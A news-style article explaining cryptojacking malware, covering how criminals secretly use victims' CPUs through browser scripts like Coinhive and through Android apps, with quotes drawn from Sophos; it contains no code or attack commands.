Understanding cryptomining, a new malware variant

Last year, ransomware stories dominated most headlines in the world which included damages done by WannaCry and Petya attacks to many individuals and organizations.

With new variants coming up every day, malware have become fast, brutal, and instantly disruptive. Advanced cyber criminals are now focused on cryptocurrencies, they covertly infect users’ computers with software to do the calculations needed to generate cryptocurrency – that is digital money that uses cryptography to make secure online transactions without the need for banks like Bitcoin, Monero and Ethereum. The crooks then keep any cryptocoin proceeds for themselves. This process is referred to as cryptomining.

They do this because, to make any real money withcoinmining, it requires massive amounts of computer processing power, which slows down performance and leaves wear and tear.According to Sophos cryptomining article,unlike other malwares, cryptominer don’t encryptusers files, they are able to access their data which makes cryptomining sound fair compared to ransomware.However, users computers will probably be annoyingly slow, the fans will be roaring all the time and their battery life will somehow run low.

These attacks might be serious on mobile devices since they affect battery life associated with continuous super-heavy processor usage which results in permanent damage.

Until recently, cryptomining wasn’t always a problem because the activity was largely limited to those who chose to do it. That began to change as cryptocurrency prices skyrocketed. A single Bitcoin was worth $1000 at the start of 2017 and was valued at around $17,000 by year’s end.Cyber thieves have now taken notice and started using cryptominers to make money.

For instance, JavaScript miners like those from Coinhive are added to websites and run in the browser, using visitors’ CPUs to generate cryptocurrency. Users may notice poor performance, a spike in CPU usage and batteries draining faster than usual.

“Evolving malwares continuously force us to evolve our defenses to try close all attack vectors by bad guys like cryptominers who take advantage of computing users and organizations,” says Harish Chib, VP of Middle East and Africa at Sophos. They do this because, to make any real money with coinmining, one needs a lot of electricity to deliver a lot processing power on a lot of computers.

So they can either rent space in a giant coinmining server farms, for example in Iceland, where electricity is cheap and the weather is cold enough to cool computers from melting down or they are forced to steal other people’s electricity, processing power and air conditioning by using a malware to sneak cryptominers into their networks and browsers.

Legitimate cryptomining programs ask users for permission to run. Malicious versions don’t, opting instead to quietly leach a computer’s resources. SophosLabs is seeing more of the latter variety, with a new twist:

Increasingly, SophosLabs is seeing cases of cryptominers designed to hide from users. In other words, instead of showing up as executable files, they take the form of scripts hidden on websites, mining for cryptocurrency in the browser. Without permission, these miners tap into the victim’s CPU and use the processing power to mine for digital currency. Visitors to these sites see no evidence of the mining. The only clues that something may be amiss are their computer slowing down and their fans revving up.

Malicious miners are most typically hidden on third-party web pages and in Android apps.Bitcoin has been the currency of choice for the bad guys, but Monero is becoming a lot more popular because it does not require as much processing power as it takes to dig for Bitcoin.

Ironically, a lot of coinmining software advises users not to bother running it on mobile phones: because the computing power of your mobile devices isn’t sufficient for decent results, so the costs outweigh the benefits.Well, the crooks don’t care, and this is how they don’t according to a technical report published by SophosLabs. The report states that cybercriminals are willing to put a lot of effort into getting their cryptomining code accepted into the Android Play Store, and thus to have it “blessed” with Google’s imprimatur.

Leave a Reply

Be the first to comment

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.